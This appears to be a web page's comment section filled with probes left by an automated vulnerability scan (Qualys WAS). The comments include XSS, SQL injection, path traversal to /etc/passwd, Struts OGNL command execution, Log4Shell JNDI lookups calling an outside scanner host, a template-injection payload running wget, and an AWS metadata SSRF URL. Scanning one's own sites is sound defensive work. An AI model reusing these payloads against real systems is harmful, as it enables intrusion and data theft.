231 Responses

  1. Veiligheidsscan ForusP
    | Beantwoorden

    1

  2. Veiligheidsscan ForusP
    | Beantwoorden

    “‘>

  3. Veiligheidsscan ForusP
    | Beantwoorden

    ‘ onEvent=X2944413264Y2_2Z

  4. Veiligheidsscan ForusP
    | Beantwoorden

    javascript:qxss(X2944413264Y2_2Z);

  5. Veiligheidsscan ForusP
    | Beantwoorden

    1″‘>

  6. Veiligheidsscan ForusP
    | Beantwoorden

    _q=random(X2944413264Y2_2Z)

  7. Veiligheidsscan ForusP
    | Beantwoorden

    1 _q_q=random(K9n1Mj5H)

  8. Veiligheidsscan ForusP
    | Beantwoorden

    ” SRC=//localhost/j6SHtfJRk>

  9. Veiligheidsscan ForusP
    | Beantwoorden

    “‘><qssSIJBeZ4y=7;//<

  10. Veiligheidsscan ForusP
    | Beantwoorden
  11. Veiligheidsscan ForusP
    | Beantwoorden

    1″>

  12. Veiligheidsscan ForusP
    | Beantwoorden

    ” onEvent=X2944413264Y2_2Z

  13. Veiligheidsscan ForusP
    | Beantwoorden

    %3cscript z%3e_q(y)%3c/script%3e

  14. Veiligheidsscan ForusP
    | Beantwoorden

    q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA

  15. Veiligheidsscan ForusP
    | Beantwoorden

    q
    Qualys_resp_hdr_injection: Vulnerable

  16. Veiligheidsscan ForusP
    | Beantwoorden

    1′

  17. Veiligheidsscan ForusP
    | Beantwoorden

    #

  18. Veiligheidsscan ForusP
    | Beantwoorden

    /*

  19. Veiligheidsscan ForusP
    | Beantwoorden

    ,

  20. Veiligheidsscan ForusP
    | Beantwoorden

    1e309

  21. Veiligheidsscan ForusP
    | Beantwoorden

    //….//….//….//….//….//….//….//etc/passwd

  22. Veiligheidsscan ForusP
    | Beantwoorden

    php://filter/read=string.rot13/resource=/etc/passwd

  23. Veiligheidsscan ForusP
    | Beantwoorden

    %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  24. Veiligheidsscan ForusP
    | Beantwoorden

    %25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  25. Veiligheidsscan ForusP
    | Beantwoorden

    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  26. Veiligheidsscan ForusP
    | Beantwoorden

    |netstat -an

  27. Veiligheidsscan ForusP
    | Beantwoorden

    “;(function(){qxss7ahv0Y8i});/**/”

  28. Veiligheidsscan ForusP
    | Beantwoorden

    qualys(aqxssvCg13NpI)xyz

  29. Veiligheidsscan ForusP
    | Beantwoorden

    9;(function(){qxssj6nONlFl});//

  30. Veiligheidsscan ForusP
    | Beantwoorden

    9
    ;(function(){qxss8j55E5iE});//

  31. Veiligheidsscan ForusP
    | Beantwoorden

    */;(function(){qxss2u71CsYP});/*

  32. Veiligheidsscan ForusP
    | Beantwoorden

    “-qxssPT06HXuG()-“

  33. Veiligheidsscan ForusP
    | Beantwoorden

    |aaaa
    =(23.0231*213.759)
    |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

  34. Veiligheidsscan ForusP
    | Beantwoorden

    {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

  35. Veiligheidsscan ForusP
    | Beantwoorden

    ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
    /*

    #set($value=23.0231*213.759)
    $value
    */

  36. Veiligheidsscan ForusP
    | Beantwoorden

    (23.0231*213.759)

  37. Veiligheidsscan ForusP
    | Beantwoorden

    <!–#config timefmt="” –>qualyswas:

  38. Veiligheidsscan ForusP
    | Beantwoorden

    http://169.254.169.254/latest/meta-data/

  39. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:ldap://461c04b4d8f4690329a4d839073df8e7771517ac.1634765810231792.1902189974.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  40. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://953bfb5fa0ae6bbfe591cdb13917cfaedc3d202a.1634765810231792.4013973936.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

  41. Veiligheidsscan ForusP
    | Beantwoorden

    ${j${::-n}di:ldap${::-:}//8c7048cb1d7d3dab810c29d9ae1aeeb42af69b54.1634765810231792.1727386924.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  42. Veiligheidsscan ForusP
    | Beantwoorden

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//7ce7202496787196a5fc04ff8e1713fe6c9c24a2.1634765810231792.1776862305.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  43. Veiligheidsscan ForusP
    | Beantwoorden

    ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//8026959e8c9aee034d7e71a6ab7cfc95e98f9105.1634765810231792.2488950886.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

  44. Veiligheidsscan ForusP
    | Beantwoorden

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://72c48c524aac1827caa82ff645a3406473060f09.1634765810231792.518250062.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  45. Veiligheidsscan ForusP
    | Beantwoorden

    1′) or 2634=2634 —

  46. Veiligheidsscan ForusP
    | Beantwoorden

    1′ or 3789=3789 —

  47. Veiligheidsscan ForusP
    | Beantwoorden

    1 or 4325=4325 —

  48. Veiligheidsscan ForusP
    | Beantwoorden

    1 or NULL IS NULL

  49. Veiligheidsscan ForusP
    | Beantwoorden

    1 and NULL IS NULL

  50. Veiligheidsscan ForusP
    | Beantwoorden

    1′) or ‘swqtp’=’swqtp

  51. Veiligheidsscan ForusP
    | Beantwoorden

    1′ or ’tpklq’=’tpklq

  52. Veiligheidsscan ForusP
    | Beantwoorden

    11 or 11=11

  53. Veiligheidsscan ForusP
    | Beantwoorden

    1′ or true() or ‘and’ = ‘and

  54. Veiligheidsscan ForusP
    | Beantwoorden

    1 or true() or ‘and’ = ‘and’

  55. Veiligheidsscan ForusP
    | Beantwoorden

    1″ or true() or “and” = “and

  56. Veiligheidsscan ForusP
    | Beantwoorden

    aaaa&ping -n 92 localhost&

  57. Veiligheidsscan ForusP
    | Beantwoorden

    ping -c2 -i91 localhost

  58. Veiligheidsscan ForusP
    | Beantwoorden

    |ping -c2 -i91 localhost

  59. Veiligheidsscan ForusP
    | Beantwoorden

    1WAITFOR DELAY ’00:00:29′

  60. Veiligheidsscan ForusP
    | Beantwoorden

    1;WAITFOR DELAY ’00:00:29′;

  61. Veiligheidsscan ForusP
    | Beantwoorden

    1);WAITFOR DELAY ’00:00:29′–

  62. Veiligheidsscan ForusP
    | Beantwoorden

    1′);WAITFOR DELAY ’00:00:29′–

  63. Veiligheidsscan ForusP
    | Beantwoorden

    1′,0,0);WAITFOR DELAY’00:00:29′–

  64. Veiligheidsscan ForusP
    | Beantwoorden

    1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)

  65. Veiligheidsscan ForusP
    | Beantwoorden

    1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘

  66. Veiligheidsscan ForusP
    | Beantwoorden

    1;SELECT sleep(29); —

  67. Veiligheidsscan ForusP
    | Beantwoorden

    1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/

  68. Veiligheidsscan ForusP
    | Beantwoorden

    1′; var djci=sleep(29*1000);//

  69. Veiligheidsscan ForusP
    | Beantwoorden

    1′; var djci=sleep(29*1000) + ‘

  70. Veiligheidsscan ForusP
    | Beantwoorden

    1′ + sleep(29*100*Math.sqrt(100)) + ‘

  71. Veiligheidsscan ForusP
    | Beantwoorden

    1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))

  72. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:ldap://5f8a9f657a07d970b6dbd3eb17f27e0422a134ce.1636475110231792.2778060603.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  73. Veiligheidsscan ForusP
    | Beantwoorden

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://dd45fa0b3c726fd86720c01ec94aaf4e7c874078.1636475110231792.2137006354.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  74. Veiligheidsscan ForusP
    | Beantwoorden

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//1256737650dc99b2927a34d7c7256e64192d152f.1636475110231792.2852720337.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  75. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:ldap://d6ca5460da0a41d28c5407f82068cd3cd90dcdfb.1636342510231792.3065817658.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  76. Veiligheidsscan ForusP
    | Beantwoorden

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://65b2587f0c0a906d4dae45272346d9c90e0a3a7f.1636342510231792.1771851914.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  77. Veiligheidsscan ForusP
    | Beantwoorden

    ${j${::-n}di:ldap${::-:}//8c257467ad7b3a5bad39a178fa37be95bcbe1349.1636342510231792.1783544005.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  78. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:dns://687accb93aba030c35dda5cda04c8f9ce5239a56.1636342510231792.3032302317.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  79. Veiligheidsscan ForusP
    | Beantwoorden

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://81879097ee66c36658584e6221e8480d59309994.1636342510231792.1316309333.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  80. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:ldap://70eca1734517d7c0e07198db265de32b526ad484.1637118210231792.2161254033.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  81. Veiligheidsscan ForusP
    | Beantwoorden

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://55200f45acada3488e1e39ae81cc026cd1845e8d.1637118210231792.1978598297.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  82. Veiligheidsscan ForusP
    | Beantwoorden

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c147055f60df36755b450e39dfcb241ea7117447.1637118210231792.233373713.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  83. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:ldap://3ee4e62f45e7473f5b06373dc6ebb7c1ef082656.1637118610231792.994553586.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  84. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:ldap://dc870c2152a2f5a38e9efc462b78315d98dfb754.1644309110231792.472129726.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  85. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:dns://315c87be826baa4cb81da118eb7d5ed3d60cdfab.1644309110231792.4123806609.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  86. Veiligheidsscan ForusP
    | Beantwoorden

    _q=random(X149364044Y2_2Z)

  87. Veiligheidsscan ForusP
    | Beantwoorden

    ‘ onEvent=X149364044Y2_2Z

  88. Veiligheidsscan ForusP
    | Beantwoorden

    ” onEvent=X149364044Y2_2Z

  89. Veiligheidsscan ForusP
    | Beantwoorden

    javascript:qxss(X149364044Y2_2Z);

  90. Veiligheidsscan ForusP
    | Beantwoorden

    “>

  91. Veiligheidsscan ForusP
    | Beantwoorden

    z–>

  92. Veiligheidsscan ForusP
    | Beantwoorden

    1 _q_q=random(SqkDumMv)

  93. Veiligheidsscan ForusP
    | Beantwoorden

    ” SRC=//localhost/j1nPO24yK>

  94. Veiligheidsscan ForusP
    | Beantwoorden

    “‘><qss9EQ3x7D3=7;//<

  95. Veiligheidsscan ForusP
    | Beantwoorden

    BODY{background:url(“javascript:qsscB3hgwtt=7”)}

  96. Veiligheidsscan ForusP
    | Beantwoorden

    qssqK4a4G33=7

  97. Veiligheidsscan ForusP
    | Beantwoorden

    <script src=http://localhost/j

  98. Veiligheidsscan ForusP
    | Beantwoorden

    q
    Qualys_resp_hdr_injection: Vulnerable

  99. Veiligheidsscan ForusP
    | Beantwoorden

    qualyswasesi

  100. Veiligheidsscan ForusP
    | Beantwoorden

    ;–

  101. Veiligheidsscan ForusP
    | Beantwoorden

  102. Veiligheidsscan ForusP
    | Beantwoorden

    (

  103. Veiligheidsscan ForusP
    | Beantwoorden

    ….//….//….//….//….//….//etc/passwd

  104. Veiligheidsscan ForusP
    | Beantwoorden

    a(){}phpinfo(); function a

  105. Veiligheidsscan ForusP
    | Beantwoorden

    http://rfitest/

  106. Veiligheidsscan ForusP
    | Beantwoorden

    “;(function(){qxss6QzpNrEP});/**/”

  107. Veiligheidsscan ForusP
    | Beantwoorden

    “);(function(){qxssnRrIM512});/**/”

  108. Veiligheidsscan ForusP
    | Beantwoorden

    qualys(aqxsskhm2FJvQ)xyz

  109. Veiligheidsscan ForusP
    | Beantwoorden

    ‘;(function(){qxss1Mp92x5x});/**/’

  110. Veiligheidsscan ForusP
    | Beantwoorden

    9;(function(){qxssLsV7rt6F});//

  111. Veiligheidsscan ForusP
    | Beantwoorden

    9
    ;(function(){qxssl368yK6v});//

  112. Veiligheidsscan ForusP
    | Beantwoorden

    */;(function(){qxssP4o51LjN});/*

  113. Veiligheidsscan ForusP
    | Beantwoorden

    ‘-qxssx0Z7h800()-‘

  114. Veiligheidsscan ForusP
    | Beantwoorden

    “-qxss76HdXSzj()-“

  115. Veiligheidsscan ForusP
    | Beantwoorden

    function(){qxssuX9GNhsI};

  116. Veiligheidsscan ForusP
    | Beantwoorden

    Joe+
    bcc:was_engine@ab099a9d00dbea5481d3816c6b5bf15b709efea4.1647394710231792.929233607.smtphi01.smtp.eu1.qualysperiscope.com.

  117. Veiligheidsscan ForusP
    | Beantwoorden

    ping -c 2 38965d95b1b4deae9ff7153cd2e4b86f8dfd8ba7.1647394710231792.4179424901.oscomm01.oscomm.eu1.qualysperiscope.com.

  118. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:ldap://1bec869fc1c87e2e9506f39f88ae1c59d5e8bdc8.1647394710231792.3589206250.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  119. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:rmi://d9c9a9d096d01a8d8225b2a7ee0ceb995882e8cc.1647394710231792.200049609.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

  120. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://81798af5aa24d2f41e053fb3f951dbb702c8ae20.1647394710231792.1072747213.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

  121. Veiligheidsscan ForusP
    | Beantwoorden

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://df1165089b3360abb45c1816a163ca02fb350516.1647394710231792.3525915384.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  122. Veiligheidsscan ForusP
    | Beantwoorden

    ${j${::-n}di:ldap${::-:}//98de0d59b8b696c0888c065dd7e9d2ba00d3ad17.1647394710231792.3479971217.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  123. Veiligheidsscan ForusP
    | Beantwoorden

    ${jnd${123%ff:-${123%ff:-i:}}ldap://163dab7bd174546bdebaea2a84d8c381e08a36ae.1647394710231792.3933946296.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

  124. Veiligheidsscan ForusP
    | Beantwoorden

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//7acc1e4ea8938745ce1775a596d4acf74509a98c.1647394710231792.4221832301.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  125. Veiligheidsscan ForusP
    | Beantwoorden

    ${jndi:dns://5552dcb0f7650dd778908e00061e50650b2d336e.1647394710231792.3566758011.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  126. Veiligheidsscan ForusP
    | Beantwoorden

    ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//c167f27e6c3a2b20708e06cbb8de937888d9ea9c.1647394710231792.4292510324.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

  127. Veiligheidsscan ForusP
    | Beantwoorden

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://383e96009912841815fee362af52d09076c37eb1.1647394710231792.3674592551.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

  128. Veiligheidsscan ForusP
    | Beantwoorden

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://e87145ace756619e110fb82905772702a952df9f.1647394710231792.3746020778.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  129. Veiligheidsscan ForusP
    | Beantwoorden

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://f078b89543f6b2284d47e48176ee9cd9ad0942e1.1647394710231792.2566342378.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}

  130. Veiligheidsscan ForusP
    | Beantwoorden

    1′) and 2634=1123 —

  131. 1
    | Beantwoorden

    1

  132. 1
    | Beantwoorden

    “‘>

  133. 1
    | Beantwoorden

    ‘ onEvent=X140021438507792Y2_2Z

  134. 1
    | Beantwoorden

    ” onEvent=X140021438507792Y2_2Z

  135. 1
    | Beantwoorden

    “>

  136. 1
    | Beantwoorden

    1″‘>

  137. 1
    | Beantwoorden

    z–>

  138. "'>
    | Beantwoorden

    1

  139. 1
    | Beantwoorden

    qss9pZSkwI7=7

  140. 1
    | Beantwoorden

    %3cscript z%3e_q(y)%3c/script%3e

  141. 1
    | Beantwoorden

    qss{{q=(2*2.0)}}qss

  142. 1
    | Beantwoorden

    {{333*334}}

  143. 1
    | Beantwoorden

    q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA

  144. 1
    | Beantwoorden

    q
    Qualys_resp_hdr_injection: Vulnerable

  145. 1
    | Beantwoorden

    q
    Qualys_resp_hdr_injection: Vulnerable

  146. 1
    | Beantwoorden

    qualyswasesi

  147. 1
    | Beantwoorden

    1′

  148. 1
    | Beantwoorden

    ;–

  149. 1
    | Beantwoorden

    #

  150. 1
    | Beantwoorden

    /*

  151. 1
    | Beantwoorden

  152. 1
    | Beantwoorden

    ,

  153. 1
    | Beantwoorden

    (

  154. 1
    | Beantwoorden

    1e309

  155. 1
    | Beantwoorden

    //….//….//….//….//….//….//….//etc/passwd

  156. 1
    | Beantwoorden

    php://filter/read=string.rot13/resource=/etc/passwd

  157. 1
    | Beantwoorden

    ….//….//….//….//….//….//etc/passwd

  158. 1
    | Beantwoorden

    %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  159. 1
    | Beantwoorden

    %25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  160. 1
    | Beantwoorden

    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  161. 1
    | Beantwoorden

    a(){}phpinfo(); function a

  162. 1
    | Beantwoorden

    |netstat -an

  163. 1
    | Beantwoorden

    http://rfitest/

  164. 1
    | Beantwoorden

    “;(function(){qxssGwIVq7op});/**/”

  165. 1
    | Beantwoorden

    “);(function(){qxss0cEdlW0T});/**/”

  166. 1
    | Beantwoorden

    qualys(aqxssf4kd8532)xyz

  167. 1
    | Beantwoorden

    ‘;(function(){qxss39hiH3h9});/**/’

  168. 1
    | Beantwoorden

    9;(function(){qxssSZ7RRKrA});//

  169. 1
    | Beantwoorden

    9
    ;(function(){qxssD58IE96t});//

  170. 1
    | Beantwoorden

    */;(function(){qxss1q6g56UB});/*

  171. 1
    | Beantwoorden

    ‘-qxss617SP9Cb()-‘

  172. 1
    | Beantwoorden

    “-qxssVj9h9rnq()-“

  173. 1
    | Beantwoorden

    1!@#$%^&*()

  174. 1
    | Beantwoorden

    !@#$%^&*()1

  175. 1
    | Beantwoorden

    !@#$%^&*()

  176. 1
    | Beantwoorden

    |aaaa
    =(23.0231*213.759)
    |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

  177. 1
    | Beantwoorden

    {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

  178. 1
    | Beantwoorden

    ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
    /*

    #set($value=23.0231*213.759)
    $value
    */

  179. 1
    | Beantwoorden

    (23.0231*213.759)

  180. 1
    | Beantwoorden

    <!–#config timefmt="” –>qualyswas:

  181. 1
    | Beantwoorden

    Joe+
    bcc:was_engine@94946638f23bbd51f09c1c98feae1f316e048dbd.1768425210231792.741032307.smtphi01.smtp.eu1.qualysperiscope.com.

  182. 1
    | Beantwoorden

    1ee1d132944de689c2e8e6373940fad9673155fa.1768425210231792.3832881590.ssrf02.ssrf.eu1.qualysperiscope.com.

  183. 1
    | Beantwoorden

    ${jndi:ldap://748d2637f9307c3279ffa82f5e6a81fb66468f49.1768425210231792.3605174985.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  184. 1
    | Beantwoorden

    ${jndi:rmi://b4066dcb3b35e3b721d36726ed1c0f06b871968f.1768425210231792.959930066.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

  185. 1
    | Beantwoorden

    ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2059b1f2255e32017cad77a4b52e8db495578c28.1768425210231792.3455111963.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

  186. 1
    | Beantwoorden

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://27542760eb03984959353453311c8bcfcca666c9.1768425210231792.1888016097.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  187. 1
    | Beantwoorden

    ${j${::-n}di:ldap${::-:}//564fc2e865493c5f700af21eed18c922fcef84f7.1768425210231792.347913168.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  188. 1
    | Beantwoorden

    ${jnd${123%ff:-${123%ff:-i:}}ldap://59cf730340f2f0a986f761ae3d7fe0d55e671723.1768425210231792.3171074698.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

  189. 1
    | Beantwoorden

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//dabf16dfedac82ce205b7e52760f8dcc55664b2f.1768425210231792.2803168822.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  190. 1
    | Beantwoorden

    ${jndi:dns://e2333964323c79682690f4b6ab1a51cfe01d205a.1768425210231792.1618199424.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  191. 1
    | Beantwoorden

    ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//e8c3e0949ea5bfbc2fa90db7dab75c6fa0b55a54.1768425210231792.3987385491.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

  192. 1
    | Beantwoorden

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://136ce6054c88125bdfdf2db9a3642dc27455ab11.1768425210231792.1401039065.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

  193. 1
    | Beantwoorden

